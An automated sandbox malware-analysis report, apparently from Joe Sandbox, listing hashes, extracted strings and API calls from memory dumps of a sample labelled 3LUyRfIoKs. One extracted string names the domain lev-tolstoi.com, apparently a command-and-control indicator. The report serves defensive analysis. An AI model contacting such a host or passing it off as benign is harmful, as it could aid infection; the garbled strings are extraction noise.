                                                                                                                                                                                                                                                • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                                • API String ID: 237503144-1429676654
                                                                                                                                                                                                                                                • Opcode ID: 6155beef7ffe214d38310d075c27d8524b8dfa8259945cb66631801b7f09d27a
                                                                                                                                                                                                                                                • Instruction ID: 651a2e0f4966e24736d5e73875ab882850eca2ac9a065e7c5b7ee86065b665a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6155beef7ffe214d38310d075c27d8524b8dfa8259945cb66631801b7f09d27a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCC20CB560C3848AD334CF54D452BDFBAF2FB82300F00892DD5E96B255D7B5864A8B9B
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                                                                                                • API String ID: 0-2746398225
                                                                                                                                                                                                                                                • Opcode ID: 53d0bf3660ccd4b6d0e132953caae5b66a250c68e63a54eb4f5c753d845670d4
                                                                                                                                                                                                                                                • Instruction ID: b3ed05fc407b1fbfbbe272686ea6b747a371d32bff04522b2765a163e96c2e91
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53d0bf3660ccd4b6d0e132953caae5b66a250c68e63a54eb4f5c753d845670d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 574204726082908FD724CF28D8917AFB7E6BFD6314F19893CD4D98B296D7359806CB42
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: z{w$3uO$3uO$3uO$>h{w$[*j$$,_}${Z
                                                                                                                                                                                                                                                • API String ID: 0-2657773319
                                                                                                                                                                                                                                                • Opcode ID: 56eda4826374ed6763e8c208f82d1d4fcb8d2488a27573e965d326f4b4dee48b
                                                                                                                                                                                                                                                • Instruction ID: 8c901278f449eec002fb231db2c1da81595be48a159c08aebd14ce475f72e5c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56eda4826374ed6763e8c208f82d1d4fcb8d2488a27573e965d326f4b4dee48b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB238F3A0C2049FE3046E2DEC8567AB7E9EF94720F1A493DEAC5C7744EA7558018792
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                                                                                                • API String ID: 0-3116432788
                                                                                                                                                                                                                                                • Opcode ID: 1d8c31512e2007261356927b50f79d5051b81e42b06658ddd0752c10eaf3c724
                                                                                                                                                                                                                                                • Instruction ID: ac0f4529509fafdae4ae86e7f368a5f01339855f81a4ab6964f29a2afc8d61a5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d8c31512e2007261356927b50f79d5051b81e42b06658ddd0752c10eaf3c724
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 558246715083518BC724CF28C8917AFB7E1FFD9364F198A6CE8D59B2A6E7748805CB42
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
                                                                                                                                                                                                                                                • API String ID: 0-3116088196
                                                                                                                                                                                                                                                • Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                                                                                                • Instruction ID: 6005ce11db38c14aae38769b8c496db4f2d52fddf50f2c7c196834f527ee2725
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEC10471A4C3D54BD322CF6994A076BFFD19FD7210F084AACE4D51B386D365890ACB92
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #!zc$C0N$O6,>$U s$[Dy}$~7
                                                                                                                                                                                                                                                • API String ID: 0-1068904081
                                                                                                                                                                                                                                                • Opcode ID: a40f91384055a6071a1547cdd8a9240da60a723d1ac95a0126b4609da80a9663
                                                                                                                                                                                                                                                • Instruction ID: 3a1feb4c080a4170b9689c90de2e2543162a270d720806b4edb17788b95f5de1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a40f91384055a6071a1547cdd8a9240da60a723d1ac95a0126b4609da80a9663
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BA2F4F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A493DEAC583744E63558058697
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00AC84BD
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00AC85B4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                • Opcode ID: b06b1e6aaa4717bde48c905bbcfe6c66bf309627461466bdf3823e393475cbec
                                                                                                                                                                                                                                                • Instruction ID: 613fd8b3c1b2a5a1fdfb582305adcaa8856234e3c8f54e9e49d4f8c69d34be00
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b06b1e6aaa4717bde48c905bbcfe6c66bf309627461466bdf3823e393475cbec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD22D271908381CFD724CF28D890B2FB7E1BF85310F1A4A6CE5955B2A1D7359A52CB52
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00AC84BD
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00AC85B4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                • Opcode ID: b07fd69d07e7e16ddde4c890531a0cae97bff5e991e2063b240a936fdf889b9a
                                                                                                                                                                                                                                                • Instruction ID: 25b867129866f9af2356d5e1fef0912d0bad5a0ca9834197bc7a343121d19f72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b07fd69d07e7e16ddde4c890531a0cae97bff5e991e2063b240a936fdf889b9a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E112D171908381CFD724CF28D880B2FBBE1BF85310F1A4A6CE5995B2A1D735DA46CB52
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                                                                                                                                                                                                                • API String ID: 0-1171452581
                                                                                                                                                                                                                                                • Opcode ID: df42457feeb5d5775c0ea691bd42c6b848744252f340fb0d6d9a0ec3eefccf77
                                                                                                                                                                                                                                                • Instruction ID: 867c6b6ffdb8b3e2eb96ccd226970eef2d8ddd60a5207a84af2d1c9564c1faa8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df42457feeb5d5775c0ea691bd42c6b848744252f340fb0d6d9a0ec3eefccf77
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D091F2B16083009BD714DF24C891F6BB7B5EF95314F1A882CE98A8B292E775D905CB62
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                                                                                                                                                                • API String ID: 0-3257051659
                                                                                                                                                                                                                                                • Opcode ID: 975e3d4f5500bbed1e6e44b9376ea2dbc8fa9ca38e63467850293b8e12a807c3
                                                                                                                                                                                                                                                • Instruction ID: 5f642f60d25796bc96450431f0de98f2ee17ba7d266ced9f24c112480a757fbe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 975e3d4f5500bbed1e6e44b9376ea2dbc8fa9ca38e63467850293b8e12a807c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1A13772A142504BD324CF28D8517AFB7EAFBD5314F198A3DD485DB392DB388802C781
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 9deZ$eb$sp${s
                                                                                                                                                                                                                                                • API String ID: 0-3993331145
                                                                                                                                                                                                                                                • Opcode ID: b28df45eb183b322b1e777f3d2803596a73ad5552269ae49aa9bf807a01e520c
                                                                                                                                                                                                                                                • Instruction ID: 8ba03d8f300df80b6c7033f05391e5d8cea48bf566b025e2d212202378fcd710
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b28df45eb183b322b1e777f3d2803596a73ad5552269ae49aa9bf807a01e520c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81D1D3B16183148BC724DF24C891B6BB7E1FFD6354F099A1CE4968B3A1E778D904CB52
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 00AC91DA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: +Ku$wpq
                                                                                                                                                                                                                                                • API String ID: 237503144-1953850642
                                                                                                                                                                                                                                                • Opcode ID: 6906a31b43a14f498591294e05eceb3073014447cf2d45ed2ad5f3d78badd640
                                                                                                                                                                                                                                                • Instruction ID: 62002a96540e5c2ef7762b1bcb46ada53a2eac0db246e36784d9122d6973df4b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6906a31b43a14f498591294e05eceb3073014447cf2d45ed2ad5f3d78badd640
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D151BD7221C3518FC324CF69984076FB6E6EBC5310F15892DE4DACB285DB70D50A8B92
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00AC9170
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: M/($M/(
                                                                                                                                                                                                                                                • API String ID: 237503144-1710806632
                                                                                                                                                                                                                                                • Opcode ID: 316c47b2f6aef3b36ff97083a33de5176564506875b30cdd6902c7677a1fe8c8
                                                                                                                                                                                                                                                • Instruction ID: 2837162df633710f04bc99d24157f862a758aab17db85e3c774485c64389dc6b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 316c47b2f6aef3b36ff97083a33de5176564506875b30cdd6902c7677a1fe8c8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70212371A5C3515FE714CE389886B9FF7AAEBC2700F01892CE0D1DB1C5D675880B8756
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: VN$VN$i$i
                                                                                                                                                                                                                                                • API String ID: 0-1885346908
                                                                                                                                                                                                                                                • Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                                                • Instruction ID: ad50bda7c22c7417eb680a23af4ee06345df8218d3f0429ef924c1f3edf4d8d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7821C6211483898AD3058F7580407B6BBE3ABD671CF29865ED1F15B391EA3BC90A4757
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .txt$<\hX$_^]\
                                                                                                                                                                                                                                                • API String ID: 0-3117400391
                                                                                                                                                                                                                                                • Opcode ID: a07252a179141e236555f882d55a48bf7728eb2b5d3bcf2fbcb93b8011f2dfc8
                                                                                                                                                                                                                                                • Instruction ID: a0028d2b16bf2590f378e084d0e52c534d8dc05fd809cc41356075dc5bc141a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a07252a179141e236555f882d55a48bf7728eb2b5d3bcf2fbcb93b8011f2dfc8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7C1107160C384DFD708DF28D891A3EBBE2AFD5314F198A6CF0954B2A2D7359946CB12
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Fm$V]$lev-tolstoi.com
                                                                                                                                                                                                                                                • API String ID: 0-1622397547
                                                                                                                                                                                                                                                • Opcode ID: 1fab0e534694f7617658631522793866c128aa4ce373efadf030bd837e57d33d
                                                                                                                                                                                                                                                • Instruction ID: 4cffec72a54fef5dd7767ac486b732732c2456e9d3b1011de05034adc3f7ccc9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fab0e534694f7617658631522793866c128aa4ce373efadf030bd837e57d33d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D91BFB66557818FD325CF29C480656BFA2EF97318729869CC0D64F766C33AA807CB50
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 2Tev$:?_
                                                                                                                                                                                                                                                • API String ID: 0-3367961955
                                                                                                                                                                                                                                                • Opcode ID: b2541660e373653e7b553114a5284aad0501f381223e2768d1d1da61259bcb9a
                                                                                                                                                                                                                                                • Instruction ID: d51ef8cbb4e182d1006d65abf13137cd658141edf78a50f47cdcffc2a0e26726
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2541660e373653e7b553114a5284aad0501f381223e2768d1d1da61259bcb9a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C922BF360C2049FE308AE2DEC8577AB7E9EB94320F1A453DE6C5C7744EA3598058697
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: [V$bh
                                                                                                                                                                                                                                                • API String ID: 0-2174178241
                                                                                                                                                                                                                                                • Opcode ID: e165497e7aac2966f6816d549ac397c419ef4827fb9e140fc932b37e66474b60
                                                                                                                                                                                                                                                • Instruction ID: 746c412717f308ad02c40c6c51e530f27012ebacdcc6bb61957dac8f0257a897
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e165497e7aac2966f6816d549ac397c419ef4827fb9e140fc932b37e66474b60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E3215B1911611CBCB24CF28C8926FBB7B1FF95310F18826CD8969B395F735A941CB91
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: A%n$d
                                                                                                                                                                                                                                                • API String ID: 0-2121468217
                                                                                                                                                                                                                                                • Opcode ID: 7f988a82b5294d7a7e25cb5195b27b0bd8aca655c39d29ccdd402a18aa1739a1
                                                                                                                                                                                                                                                • Instruction ID: 40a2c61d1d3e2d8f2ae2567da815559d08b28893766acf63481c060a68795152
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f988a82b5294d7a7e25cb5195b27b0bd8aca655c39d29ccdd402a18aa1739a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C112CDF3F156154BF3444D29CD88366BA93EBD4320F2B823D9B98977C9D97D9C0A8284
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: &$G~$+s
                                                                                                                                                                                                                                                • API String ID: 0-2345096911
                                                                                                                                                                                                                                                • Opcode ID: 294e68cd6cae8e07d0e67430c724851adec49ac49b283c6ff080601d6594f7fc
                                                                                                                                                                                                                                                • Instruction ID: 73da378953dfa8ba9c53e049ec51a7cc92dd4d0893807381fc56d258cb37f964
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 294e68cd6cae8e07d0e67430c724851adec49ac49b283c6ff080601d6594f7fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5F1F0F3E142254BF3189D39DC98366B692DB94320F2F823D9F89977C5E97E6C064284
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: )$IEND
                                                                                                                                                                                                                                                • API String ID: 0-707183367
                                                                                                                                                                                                                                                • Opcode ID: 3f88257d034e4e584a53be62d121ff58259b64b3ebfc554dec0628dc0f17bbd1
                                                                                                                                                                                                                                                • Instruction ID: cce041fe163ec6ddd6f9ac0558a8f72b49bafd12fffee8eecea6efb5e3a08091
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f88257d034e4e584a53be62d121ff58259b64b3ebfc554dec0628dc0f17bbd1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88D16E719083449FD720CF18D845B5FBBE4AB9A304F14492DF9999B3C2D7B5E908CB92
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: NKnt
                                                                                                                                                                                                                                                • API String ID: 0-2320916799
                                                                                                                                                                                                                                                • Opcode ID: 69914ebaf7b622a692ed51d5df4d597f338ac691a345fad13b59c97c45fab3f6
                                                                                                                                                                                                                                                • Instruction ID: 9c0b9c5092db5b5820996724019405384cd201b7593ce3dbd58d2f9cffe4b43c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69914ebaf7b622a692ed51d5df4d597f338ac691a345fad13b59c97c45fab3f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A302BFF3F102248BF3145E29CC94366B692EB94320F2B863CDF899B7C5E97E5C459285
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: }s~]
                                                                                                                                                                                                                                                • API String ID: 0-1254099045
                                                                                                                                                                                                                                                • Opcode ID: 44b708380a5afa7239d3a5a7339590f9fe7e7a917692ad4d510abc1655a0af17
                                                                                                                                                                                                                                                • Instruction ID: 68427d41141ef411a500b4d13c6a874be1249861e89d8a15f1b5e1b171e913a5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44b708380a5afa7239d3a5a7339590f9fe7e7a917692ad4d510abc1655a0af17
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2E1C1F3F146104BF3445E28DC993A6B6D6DB94321F2A813CDB889B7C8E97E9D054385
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: =5o
                                                                                                                                                                                                                                                • API String ID: 0-2641482702
                                                                                                                                                                                                                                                • Opcode ID: cd69a4458e13683abf7b05e3056593d4161aee54d08767cae053049dc08c34dc
                                                                                                                                                                                                                                                • Instruction ID: 44f67b68b80f6f8d175eececb381169681581ab82b31a70187a24197963a61da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd69a4458e13683abf7b05e3056593d4161aee54d08767cae053049dc08c34dc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DD1EEB3E102254BF3184D3DCD583767A86DB94320F2F823D9E99AB7C8D87E9D094284
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(1A11171A), ref: 00ACD2A4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                                • Opcode ID: 6ba072f66e88cb72385781247ffe310cc15b4fdb8ab5b604df0e4e502eacba86
                                                                                                                                                                                                                                                • Instruction ID: 927da62e5d6415b4100d2e8bd6e18259becf4901fb8c5952578ea912703d8931
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ba072f66e88cb72385781247ffe310cc15b4fdb8ab5b604df0e4e502eacba86
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2441A2745043829BE3158F38C9A0BA2BBA1EF57314F28869CE59A4F393D725E846C751
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
